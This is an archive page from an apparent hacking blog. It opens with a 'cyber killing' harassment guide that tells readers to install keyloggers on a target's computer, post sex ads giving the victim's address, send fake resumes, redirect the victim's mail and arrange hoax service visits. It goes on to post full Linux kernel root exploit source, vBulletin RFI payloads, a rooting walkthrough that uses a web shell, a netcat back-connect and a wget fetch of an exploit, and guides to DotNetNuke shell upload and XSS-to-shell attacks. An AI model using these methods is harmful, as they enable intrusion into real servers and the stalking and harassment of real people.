Category Archives: Hacking
How to RUIN somebodies life[Cyber Killing]
Secondly, If you would like to use most of these techniques I would consider getting a VPN or a Proxy. You can get a free VPN here..
It isn’t as good as a legit logless VPN but it is better than nothing.
http://proxpn.com/download.php
You will also need to put a RAT or Keylogger on their computer to gain the information you need in most circumstances.
With their information in hand create a good resume. Good but still believable. Send this resume to all of the jobs in his/her local area and word will quickly spread that this person is of low company. Word of pranks like this will really get around.
Don’t you hate it when creepy people knock at your door? Well try about twenty or more thinking they are going to have a good time!
There are multiple websites for odd balls and creeps to get together for some anonymous hanky spanky. You can find things like this on Craigslist, which is where you will have the best luck for advertising your orgy.
Simply post a few pictures of a sex room you find off of Google, a picture of the slave and the address. The best time for this would be a Saturday night. Make sure the slave is home for this.
Oh, one of the most classic get back pranks ever! However, You aren’t in it just to prank this guy.. you are here to PLAGUE him.
Simply order out from all delivery restaurants in the area. Make sure the order is believable. You could easily have 25 different delivery guys coming to his door within the hour.
This is one of the most infamous of methods to mess with somebody.
Essentially what you do is you order free boxes for your slave. Postal companies will send you free boxes.. You could easily get a few thousand of these boxes sent to the victims house. Littering his front lawn, it will piss off the neighbors and it is possible he could be nabbed for fraud.
Step 2: Go to USPS’s store section and order all the free boxes and mailing envelopes you can.
Step 3: Confirm the address and purchase the boxes.
If I remember correctly you can order up to 25 free packs on a single account. So if you do this correctly, One account can be used to send 500+ boxes. You can make multiple accounts, sending thousands of boxes.. It will be like Boxes from hell!
Who said email is the only way? Lets see how we can ruin his/her life with real mail!
Scare him! – Send truly disturbing images in envelopes, Write In blood red ink. Maybe draw a picture you could imagine a psychopath would, really make this guy quiver.
Making him believe he doesn’t have any bills anymore! – Go to the local USPS office and tell them that you are moving, or you are new to the area and need to redirect your mail temporally. You will then receive an envelope to fill out and drop in any mailbox. There is no checking done by USPS on this. Redirect mail from P.O. Boxes and rural and carrier routes as well.
Now, if you read this.. would it excite you? I’m sure it would REALLY excite a lot of people. Hit up Craigslist and other classifieds stating you are selling a lot of high end stuff, really cheap. You will get many many people coming up the the victims door looking for cheap stuff. Even the cops get involved sometimes because they suspect he stole it all. LOL
There is nothing better than watching the person you hate become lonely and desperate. If he lives with his wife/girlfriend, call.. if she answers quickly hang up. Send used panties and love letters through the mail. This will DEFINITELY raise suspicion. Be creative on this one.
This is by far the most rewarding, insane and satisfying method of making your target absolutely crazy.
First off, You will need to have Yellowpages from the targets area. You can be creative and do a general online search for businesses in the area.
Go from A-Z calling up local businesses (Mask your number), Asking for quotes and services, Arrange meetings at the victims address. Everybody from construction teams, to landscapers to carpentry estimates to exterminators will be at the targets house. Make sure you schedule out these meetings ahead of time and all within an hour or so of each other. You can be willing to bet this will cause quite a stir.
You can go as far as hire labor teams, promising $20 an hour for general labor. You can be willing to bet angry, unemployed men will not think this is funny AT ALL.
If you want to catch everything on tape, simply call local news stations and tell them there will be something big happening that morning around the time you scheduled the businesses to show up.
best case scenario.. The target gets beat up, yelled at, humiliated on national television, put in jail and fined.
How to crack MD5 hashes
In case you did not already know, MD5 is not an encryption, and therefore cannot be decrypted, only cracked.
First off, download “Password Pro” from here.
It is a zip file, so I suggest downloading 7zip.
Extract all of the files to one folder.
It should look similar to this.
For the purpose of this tutorial, I will be cracking this hash: “6dcd0f272fbb7f6f8ff3a8a5e96c45aa:Ws)”, which is formatted as “Hash:Salt”, and is from VBulletin 4.x.x.
Open up notepad, paste in the Hash and salt, and save it anywhere on your computer, preferably in the same folder as Password Pro.
Open up Password Pro and go to “File->Import”
Find the place where you saved the text file with the hash inside of it, and open it.
Fill in the boxes as such.
Note: The bottom is the formatting of the hash and salt in the text file, and the top is the algorithm for VBulletin 4.x.There are different algorithm for different hashes check this one for other hash types algorithm here .
Now, go to “Audit->Preliminary Attack”
(For this hash, as it is simple, it should probably crack it with just this.)
Hit the start button, and watch it go.
If, in the case that a Preliminary Attack does not work, just repeat the previous steps with a Rainbow Attack (If you have a Rainbow Table), a Simple Dictionary Attack, or a Brute Force Attack.
Hope you guys liked it be sure to check for more tuts and hacks
Linux Kernel 2.6.13 Local root Exploit
Here is a another local exploit for linux kernal version 2.6.13
#####################################################
# Title: Linux Kernel 2.6.13 Local root Exploit #
# Author: Angel Injection #
# Home: http://1337day.com #
# Thanks To: Inj3ct0r Team #
#####################################################
**
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <sched.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/prctl.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <linux/a.out.h>
#include <asm/unistd.h>
static struct exec ex;
static char *e[256];
static char *a[4];
static char b[512];
static char t[256];
static volatile int *c;
/* shell code */
__asm__ (" __excode: call 1f \n"
" 1: mov $23, %eax \n"
" xor %ebx, %ebx \n"
" int $0x80 \n"
" pop %eax \n"
" mov $cmd-1b, %ebx \n"
" add %eax, %ebx \n"
" mov $arg-1b, %ecx \n"
" add %eax, %ecx \n"
" mov %ebx, (%ecx) \n"
" mov %ecx, %edx \n"
" add $4, %edx \n"
" mov $11, %eax \n"
" int $0x80 \n"
" mov $1, %eax \n"
" int $0x80 \n"
" arg: .quad 0x00, 0x00 \n"
" cmd: .string \"/bin/sh\" \n"
" __excode_e: nop \n"
" .global __excode \n"
" .global __excode_e \n"
);
extern void (*__excode) (void);
extern void (*__excode_e) (void);
void
error (char *err)
{
perror (err);
fflush (stderr);
exit (1);
}
/* exploit this shit */
void
exploit (char *file)
{
int i, fd;
void *p;
struct stat st;
printf ("\ntrying to exploit %s\n\n", file);
fflush (stdout);
chmod ("/proc/self/environ", 04755);
c = mmap (0, 4096, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, 0, 0);
memset ((void *) c, 0, 4096);
/* slow down machine */
fd = open (file, O_RDONLY);
fstat (fd, &st);
p =
(void *) mmap (0, st.st_size, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0);
if (p == MAP_FAILED)
error ("mmap");
prctl (PR_SET_DUMPABLE, 0, 0, 0, 0);
sprintf (t, "/proc/%d/environ", getpid ());
sched_yield ();
execve (NULL, a, e);
madvise (0, 0, MADV_WILLNEED);
i = fork ();
/* give it a try */
if (i)
{
(*c)++;
!madvise (p, st.st_size, MADV_WILLNEED) ? : error ("madvise");
prctl (PR_SET_DUMPABLE, 1, 0, 0, 0);
sched_yield ();
}
else
{
nice(10);
while (!(*c));
sched_yield ();
execve (t, a, e);
error ("failed");
}
waitpid (i, NULL, 0);
exit (0);
}
int
main (int ac, char **av)
{
int i, j, k, s;
char *p;
memset (e, 0, sizeof (e));
memset (a, 0, sizeof (a));
a[0] = strdup (av[0]);
a[1] = strdup (av[0]);
a[2] = strdup (av[1]);
if (ac < 2)
error ("usage: binary <big file name>");
if (ac > 2)
exploit (av[2]);
printf ("\npreparing");
fflush (stdout);
/* make setuid a.out */
memset (&ex, 0, sizeof (ex));
N_SET_MAGIC (ex, NMAGIC);
N_SET_MACHTYPE (ex, M_386);
s = ((unsigned) &__excode_e) - (unsigned) &__excode;
ex.a_text = s;
ex.a_syms = -(s + sizeof (ex));
memset (b, 0, sizeof (b));
memcpy (b, &ex, sizeof (ex));
memcpy (b + sizeof (ex), &__excode, s);
/* make environment */
p = b;
s += sizeof (ex);
j = 0;
for (i = k = 0; i < s; i++)
{
if (!p[i])
{
e[j++] = &p[k];
k = i + 1;
}
}
/* reexec */
getcwd (t, sizeof (t));
strcat (t, "/");
strcat (t, av[0]);
execve (t, a, e);
error ("execve");
return 0;
}
source : http://1337day.com/exploits/17146
Linux <= 2.6.37-rc1 serial_multiport_struct Info Leak Exploit
This is a another exploit found by 1337 team for 2010 servers as i have already explained about r00ting is.do use this exploit in your hacks.
* Tested on Linux 2.6.32.1 | Linux 2.6.33.2 | 2.6.32-24-generic | 2.6.37 (2010)
* Result;
* # id
* uid=0(root) gid=0(root)
*
* 3xPl017 F0r x86_64 L1nuX k3rn3L ia32syscall 3muLatL47i0N (again) > x86_64 2.6.27+ ( not for 2.6.27 and below ! )
*
* If y0u g37 3Rr0R > ./1337
* symbol table not available, aborting!
* Process finished < O_o
* C4usE 3xpl017 Re4dS “/proc/kallsyms” | “/proc/ksyms” , iF n07 4va1bl3! iT g1ve5 ErRoR O_o
*
* Upgrade the kernel ksplice without Reboo7, and the vulneRabiLitY is gonE !
*
* Greetz: r0073r(1337day.com) ,r4dc0re ,Sid3^effects | & all members of r00tw0rm.com !
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <termios.h>
#include <linux/serial.h>
#define DEVICE "/dev/ttyS1"
int main(int argc, char* argv[]) {
int ret = 0;
int i, fd, reservedsize;
char* buf;
struct serial_multiport_struct buffer;
printf("[\\m/] Linux <= 2.6.37-rc1 serial_multiport_struct Info Leak Exploit\n");
printf("[\\m/] by Todor Donev\n");
fd = open(DEVICE, O_RDONLY);
if (fd <0) {
printf("[-] Error: f0k\n");
exit(-1);
}
if (argc < 2) {
fprintf(stderr, "[!] usg: %s <leakfile> <reservedsize>\n", argv[0]);
exit(-1);
}
if (argc > 2)
if ((reservedsize = atoi(argv[2])) == 0) {
fprintf(stderr, " [-] Sorry: (atoi) invalid outsize\n");
exit(-1);
}
fprintf(stderr, " [x] Leakfile: %s\n", argv[1]);
fprintf(stderr, " [x] Reservedsize: %u\n", reservedsize);
if ((buf = (char *)malloc(reservedsize)) == NULL) {
perror("Sorry: (malloc)");
fprintf(stderr, " [-] Sorry: Try again with other output size\n");
exit(1);
}
memset(&buffer,0,sizeof(buffer));
printf("[+] Leaking.. =)\n");
if((fd = open(argv[1], O_RDWR | O_CREAT, 0640)) == -1){
printf("[-] Error: f0k =(\n");
exit(-1);
}
for(i=0;i<=reservedsize;i++){
ret += write(fd,&buffer.reserved[i],sizeof(int));
}
close(fd);
printf("\\o/ %d bytez\n",ret);
exit(0);
}
SOURCE : http://1337day.com/exploits/14940
HOPe you guys enjoy the exploit 
vBulletin® Version 4.1.7 Beta 1 Mullti Vulnerability[RFI]
Well this is RFI EXPLOIT for the vbullentin 4.1.7Vulnerability DORK : POWERED BYvBulletin® Version 4.1.7 Beta 1" Thankx to 1337day==================================================== vBulletin® Version 4.1.7 Beta 1 Mullti Vulnerability ==================================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=0 0 . .--. .--. .---. . 1 1 .'| ) ) / | 0 0 | --: --: / .-.| .-. . . 1 1 | ) ) / ( |( ) | | 0 0 '---' `--' `--' ' `-'`-`-'`-`--| 1 1 ; 0 0 Site : 1337day.com `-' 1 1 Support e-mail : submit[at]inj3ct0r.com 0 0 >> Exploit database separated by exploit 1 1 type (local, remote, DoS, etc.) 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=1 ####################################################### # Vendor: noLogging by SCRiPTZSECTOR.ORG # Date: 2011-07-27 # Author : indoushka +++=[ Dz Offenders Cr3w ]=+++ # KedAns-Dz * Caddy-Dz * Kalashinkov3 # Jago-dz * Kha&miX * T0xic * Ev!LsCr!pT_Dz # Contact : ind0ushka@hotmail.com # Tested on : win SP2 + SP3 Fr / Back | Track 5 fr ######################################################################## # Exploit By indoushka ------------- Powered by vBulletin® Version 4.1.7 Beta 1 RFI : Function: include File: api.php Line: 139 Exploit: http://localhost/vB1/api.php?api_script=[EV!L] ################################################## Function: include File: api.php Line: 139 Exploit: http://localhost/vB1/api.php?api_script=[EV!L] ################################################## Function: require_once File: payment_gateway.php Line: 3 Exploit: http://localhost/vB1/payment_gateway.php?api[classname]=[EV!L] ################################################## Function: require_once File: payment_gateway.php Line: 3 Exploit: http://localhost/vB1/payment_gateway.php?api[classname]=[EV!L] ################################################## Function: include_once File: cronadmin.php Line: 4 Exploit: http://localhost/vB1/admincp/cronadmin.php?nextitem[filename]=[EV!L] ################################################## Function: include File: diagnostic.php Line: 12 Exploit: http://localhost/vB1/admincp/diagnostic.php?match[0]=[EV!L] ################################################## Function: require_once File: diagnostic.php Line: 18 Exploit: http://localhost/vB1/admincp/diagnostic.php?api[classname]=[EV!L] ################################################## Function: require_once File: diagnostic.php Line: 18 Exploit: http://localhost/vB1/admincp/diagnostic.php?api[classname]=[EV!L] ################################################## Function: include_once File: plugin.php Line: 22 Exploit: http://localhost/vB1/admincp/plugin.php?safeid=[EV!L] ################################################## Function: include_once File: plugin.php Line: 22 Exploit: http://localhost/vB1/admincp/plugin.php?safeid=[EV!L] ################################################## Function: include_once File: class_block.php Line: 14 Exploit: http://localhost/vB1/includes/class_block.php?file=[EV!L] ################################################## Function: require_once File: class_humanverify.php Line: 2 Exploit: http://localhost/vB1/includes/class_humanverify.php?chosenlib=[EV!L] ################################################## Function: require_once File: class_humanverify.php Line: 2 Exploit: http://localhost/vB1/includes/class_humanverify.php?chosenlib=[EV!L] ################################################## Function: require_once File: class_paid_subscription.php Line: 24 Exploit: http://localhost/vB1/includes/class_paid_subscription.php?methodinfo[classname]=[EV!L] ################################################## Function: require_once File: class_paid_subscription.php Line: 24 Exploit: http://localhost/vB1/includes/class_paid_subscription.php?methodinfo[classname]=[EV!L] ################################################## Function: require_once File: functions.php Line: 6 Exploit: http://localhost/vB1/includes/functions.php?classfile=[EV!L] ################################################## Function: require_once File: functions.php Line: 6 Exploit: http://localhost/vB1/includes/functions.php?classfile=[EV!L] ################################################## Function: include_once File: functions_cron.php Line: 8 Exploit: http://localhost/vB1/includes/functions_cron.php?nextitem[filename]=[EV!L] ################################################## Function: require File: vb.php Line: 7 Exploit: http://localhost/vB1/vb/vb.php?filename=[EV!L] ################################################## Function: require_once File: class_upgrade.php Line: 48 Exploit: http://localhost/vB1/install/includes/class_upgrade.php?chosenlib=[EV!L] ################################################## Function: require_once File: class_upgrade.php Line: 48 Exploit: http://localhost/vB1/install/includes/class_upgrade.php?chosenlib=[EV!L] ################################################## Function: include_once File: attach.php Line: 80 Exploit: http://localhost/vB1/packages/vbattach/attach.php?package=[EV!L] ################################################## Function: include_once File: attach.php Line: 604 Exploit: http://localhost/vB1/packages/vbattach/attach.php?path=[EV!L] ################################################## Function: include_once File: attach.php Line: 1222 Exploit: http://localhost/vB1/packages/vbattach/attach.php?path=[EV!L] ################################################## Directory Listing ckeditor : http://localhost/vB1/clientscript/ckeditor/ Dz-Ghost Team ===== Saoucha * Star08 * Cyber Sec * theblind74 * XproratiX * onurozkan * n2n * Meher Assel =========================== special thanks to : r0073r (inj3ct0r.com) * L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller Sid3^effects * aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net MR.SoOoFe * ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH * Sn!pEr.S!Te ---------------------------------------------------------------------------------------------------------------------------------
ROOTING (FULL TUTORIAL)
Rooting Full Tutorial
This is Tutorial Which is not discussed
What we need?
-RFI Vulnerable Script
-PHP Shell
-Netcat
-Brains and luck.
First of all, we need to get a shell on a site.
For this tutorial i will be using c100 or r57 Shell.
So, once you have it on a site, go to the ‘Backdoor Host’ tab and forward a port.
Now, go to the ‘Back Connect’ tab and insert the following settings:
1- Your IP Address.
2-The port you forwarded.
Now, go on CMD and type in:cd ‘Path To Your Netcat.exe’ and then you need to make netcat listen to the port you forwarded.To do this, type:nc -l -n -v -p port
It looked like this for me:
Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.
C:\FeAR>cd C:\
C:\>cd WINDOWS
C:\WINDOWS>nc -l -n -v -p 4444
listening on [any] 8080 …
Now, when you have netcat listening to the port you forwarded, click ‘Connect’.
When your connected, type ‘whoami’.You shouldnt have root.
Now, to find an exploit to root the box, you need to know whats the kernel version.To do this, just type ‘uname -a’.
It should look something like this:
Code:
Linux linux1.dmehosting.com 2.6.17-92.1.10.el5PAE #1 SMP Tue Aug 5 08:14:05 EDT 2008 i686
Now, we go on exploit-db.com and we will look for ’2.6.17′.
Code:
http://www.exploit-db.com/exploits/5092/
Now, we type ‘wget Linux Kernel 2.6.17 – 2.6.24.1 vmsplice Local Root Exploit on the netcat window.
Code:
wget http://xpl_url.com
So the exploit works, you must compile it in the server(gcc) and execute it via exploit(-o).
To do this we type ‘gcc 5092 -o exploit’.
Code:
gcc 5092 -o exploit
5092- After the url path.http://www.site.com/5092.
exploit- Output name.
Now you can execute your exploit by typing ‘./exploit’
Wait for the exploit to finish running and type root again.
It should output in something like this:
Code:
uid=0(root) gid=0(root) groups=500(apache)
This means you have successfully rooted the box .
There are more ways to do this, this is the way I usually do it.
there are public exploits for some servers like 2009 and 2010 but 2011 or some 2010 servers are private exploit.i will be telling how to hack those using symlink in the next tutorial.
CYA
Directory Traversal Tutorial
Directory Traversal
HTTP exploits use the Web server software to perform malicious activities. Directory traversal is one such exploit which lets attackers access restricted directories, execute commands and view data outside the normal Web server directory where the application content is stored.
http://en.wikipedia.org/wiki/Directory_traversal
Detailed Description
Attackers use directory traversal attacks to try to access restricted Web server files residing outside of the Web server’s root directory.
The basic role of Web servers is to serve files. Files can be static, such as image and HTML files, or dynamic, such as ASP and JSP files. When the browser requests a dynamic file, the Web server first executes the file and then returns the result to the browser. Hence, dynamic files are actually files executed on the Web server.
To prevent users from accessing unauthorized files on the Web server, Web servers provide two main security mechanisms: the root directory and access controls lists. The root directory limits users’ access to a specific directory in the Web server’s file system. All files placed in the root directory and in its sub-directories are accessible to users. To limit users’ access to specific files within the root directory, administrators use access control lists. Using access control lists, administrators can determine whether a file can be viewed or executed by users, as well as other access rights.
The root directory prevents attackers from executing files such as cmd.exe on Windows platforms or accessing sensitive files such as the “passwd” password file on Unix platforms, as these files reside outside of the root directory. The Web server is responsible for enforcing the root directory restriction.
By exploiting directory traversal vulnerabilities, attackers step out of the root directory and access files in other directories. As a result, attackers might view restricted files or execute powerful commands on the Web server, leading to a full compromise of the Web server.
A directory traversal vulnerability can exist either in the commercial Web server itself or in the Web application code executed on the Web server. In the case of Web application code, dynamic pages usually receive input from browsers. Here is an example of such an HTTP request:
http://www.acme-hackme.com/online/getnews.asp?item=20March2003.html
In this example, the dynamic page requested by the browser is called getnews.asp and the browser sends the Web server the parameter item with a value of 20March2003.html. When executed by the Web server, getnews.asp retrieves the file 20March2003.html from the Web server’s file system, renders it and sends it back to the browser which presents it to the user. A skilled attacker will immediately identify the potential problem in this request as the value of the parameter ends with a file extension, in this case “html”. The attacker will then assume that the dynamic page retrieves the file from the file system and uses it. By sending the following URL to the Web server:
http://www.acme-hackme.com/online/getnews.asp?item=../../../../ WINNT/win.ini
the attacker causes getnews.asp to retrieve the file ../../../../WINNT/win.ini from the file system and send it to the attacker’s browser. The term “../” stands for “one directory up”. This is a common operating system directive. Therefore, the string ../../../../WINNT/win.ini means “go four directories up and retrieve the file win.ini from there”. The attacker needs to guess how many directories to climb in order to get to the desired directory. (In this example the attacker tries to get to “C:\” and is assuming that the Web server’s root directory is located four directories below “C:\”). Guessing the exact combination is very easy. The attacker simply sends multiple requests until the desired result is achieved.
The directory traversal vulnerability occurs when programmers fail to validate input received from browsers. In the above example, the getnews.asp code does not validate that the value of the item parameter does not exceed from the root directory. The directory traversal vulnerability actually bypasses the Web server’s root directory restriction by introducing bad code into the Web server.
Web applications are not the only source of directory traversal vulnerabilities in your Web site. Some vulnerabilities exist within the Web server. These vulnerabilities can be part of sample files (e.g., sample ASP files) that exist on the Web server, or can be incorporated into the Web server software. For example, some earlier versions of the Microsoft IIS Web server included directory traversal vulnerabilities that allow attackers to fully compromise the Web server by executing files on the server. For example, the following URL:
http://www.acme-hackme.com/scripts/..%5c../winnt/system32/ cmd.exe?/c+dir+c:\
would execute the cmd.exe file (operating system shell) and run the “dir c:\” command which lists all files in the C:\ directory. Notice the string “%5c” that appears in the URL. This is a Web server escape code. Escape codes are used to represent normal characters in the form of %nn, where nn stands for a two-digit number. The escape code “%5c” represents the character “\”. The problem is that the IIS root directory enforcer did not check for escape codes and allowed that request to execute. The Web server’s operating system understands escape codes and executes the command.
Escape codes are also very useful for bypassing poorly written filters enforced on input received from users. If the filter looks for “../”, then the attacker could easily change the input to “%2e%2e/”. This has the same meaning as “../”, but is not detected by the filter. The escape code %2e represents the character “.” (dot).
vbSEO-XSS to Reverse PHP Shell
XSS is not a big deal, or is it? On many occasions, I’ve seen this vulnerability being classified as useless, not serious, and being a low threat. What I’ve always had in mind is that it’s only the capabilities of the browser, and the hackers mind which sets the limit for a XSS attack.
It may seem impossible to do anything else other than stealing sessions, cookies and performing phishing, client side defacements etc. But take a look at the picture above, that is a reverse php shell automatically injected into the site, when a vBulletin administrator viewed a malicious linkback.
The vulnerability itself I’m referring to, is a 0day within vBSEO which exists within the administrator and moderator panel only. However, the attacker is able to inject persistent scripts via this linkback feature directly into the part of these panels handling these linkbacks.
In short, the attacker crafts a malicious HTML page as shown in the advisory. Then, the attacker clicks a link to the target forum with vBSEO installed, and when the target is reached, vBSEO performs a GET-request to the attacker’s malicious HTML page (if it’s served online and if RefBacks are enabled).
The title of this page is then loaded directly into the database, and an administrator can see it sanitized in the actual thread, but also in the admin and mod panel where the title is not sanitized at all, allowing the script to run.
What is actually possible?
After discovering and researching this vulnerability, I realised it was a fine case to do further studies on and then develop a XSS worm. Fortunately I got away from that idea due to the fact it could’ve been abused globally on forums with vBSEO installed. However, the idea itself was not bad so I began developing the payload aka the javascript, which would eventually inject a PHP payload via the nice plugin feature in vBulletin.
Initially, the XSS trojan I wrote should be able to do all of this silently without the user knowing, so instead of document.write being used, appendChild which uses DOM objects, was used instead. This took a bit more work in order to function better, but the result was that the visible window would not change to the affected user getting infected with this trojan.
When the user browses to, in this case “Moderate Linkbacks”, the script is executing as soon as the user hits that page. When this happens, the trojan checks whether infection has already happened once and if not, continues. Then an iframe is created outside the visible frames, where the adminhash and securitytoken (CSRF-token) is read and saved in a local variable in the browser.
Then a new form is injected into this iframe, which contains the adminhash and the securitytoken. The form itself contains the values needed to create a new and completely valid plugin which in this case, is PHP code. At this point, the script checks again if the user has already been infected and if not, the form is submitted, the plugin is created, and a cookie is set to prevent the script from going in loops.
Most administrators, would notice the broken lock icon in case they use HTTPS / SSL, and then they would view the source. The great thing about using javascript to create HTML objects, especially with “appendChild” etc. is that it is not visible. A debugger, such as Firebug shown in the picture above is needed, unless the admin finds the malicious javascript payload and reads what it does, but then it might be too late.
During the execution of the XSS trojan, a time-out is set. When time runs out, the XSS trojan will try to delete itself leaving almost no traces, besides the possible injected plugin, and the remains of the hidden iframe outside the frames which cannot be viewed due to the way HTML works in FireFox.
If the attacker was successful, and patient as well, he would eventually see that the target website had already connected back to retrieve the title, but also that another user had triggered the XSS Trojan which hopefully injected the PHP plugin specified by the attacker.
So what’s this tool I’ve been using during my presentation of this vulnerability? It’s a recently developed tool written in Python, where the payload is written in Javascript, freely available to anyone in the bottom of this blog. I recommend however, that a user of this tool looks inside the source code.
Is XSS a serious threat then?
Yes, it definitely is.
DNN HACKING (DOT NET NUKE)
Hello This Tutorial I will be explaining how to hack a website which has a Vulnerability.
DotNetNuke is written in VB.NET, though the developer has begun to shift to C# for future core development.[4] It is distributed under both a Community EditionBSD-style license [3] and commercial proprietary licenses as the Professional and Enterprise Editions. DotNetNuke is extensible and customizable through the use of skins, modules, data providers, language packs and templates.
DotNetNuke uses a three-tier architecture model with a core framework providing support to the extensible modular structure. DotNetNuke can be extended using pluggable modules and providers that enable additional functionality. The look and feel of individual sites can be customized using skins. The following diagram illustrates the software layers of a typical DotNetNuke deployment: The current, 5.x generation of DotNetNuke requires Internet Information Services 6 and ASP.NET v2.0 to v4 and supports SQL Server 2005 and 2008. Previous generations of DotNetNuke supported SQL Server 2000 and ASP.NET v1.1.
The DotNetNuke application originally evolved out of another project, called the IBuySpy Workshop.[9] The IBuySpy Workshop application had been created by Shaun Walker [10] as an enhancement to the IBuySpy Portal that started as a sample application for the .NET Framework. Early versions of DotNetNuke were released by Shaun’s company, Perpetual Motion Inc, while later development was expanded by the open source community.
Now Lets begin the tutorial
FIRST STEP: GO TO WWW.GOOGLE.COM
SECOND STEP: IN A SEARCH BOX TYPE…….
:inurl:/tabid/36/language/en-US/Default.aspx
THIRD STEP: you will find many sites, Select ONE OF THEM….
FOURTH STEP:
For example take this site.
Example:
http://www.abc.com/Home/tabid/36/Lan…S/Default.aspx
Now replace
/Home/tabid/36/Language/en-US/Default.aspx
with
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Step 6:
You will get a Link Gallary page.So far so good!
Step 7:
Dont do anything for now,wait for the next step…
Step 8:
Now replace the URL in the address bar with a Simple Script
javascript:__doPostBack(‘ctlURL$cmdUpload’,”)
Step 9:
You will Find the Upload Option
Step 10:
Select Root (The option u will see)
Step 11:
Upload your package Your Shell c99,c100 etc etc
Here i will give u a asp shell
STEP 12: http://[PATH]/portals/0/dz4all.asp;me.jpg (eg)
DOWNLOAD LINK : http://www.mediafire.com/?ons6edehktvg737
STEP 13:
UPLOAD UR DEFACE PAGE
Dang thats it now it is defaced
Hash Analyzer
Thought I’d share this because I see many of the People requesting for what kind of hashes are the posted ones…etc This will tell you what kind of hash a particular one is so you can find the decryption algorithm accordingly.
Download Link : Here
Note: This is NOT going to decrypt your hashes.
Source: http://dz4all.com/cc/t393.html
Screenshot :
Enjoy
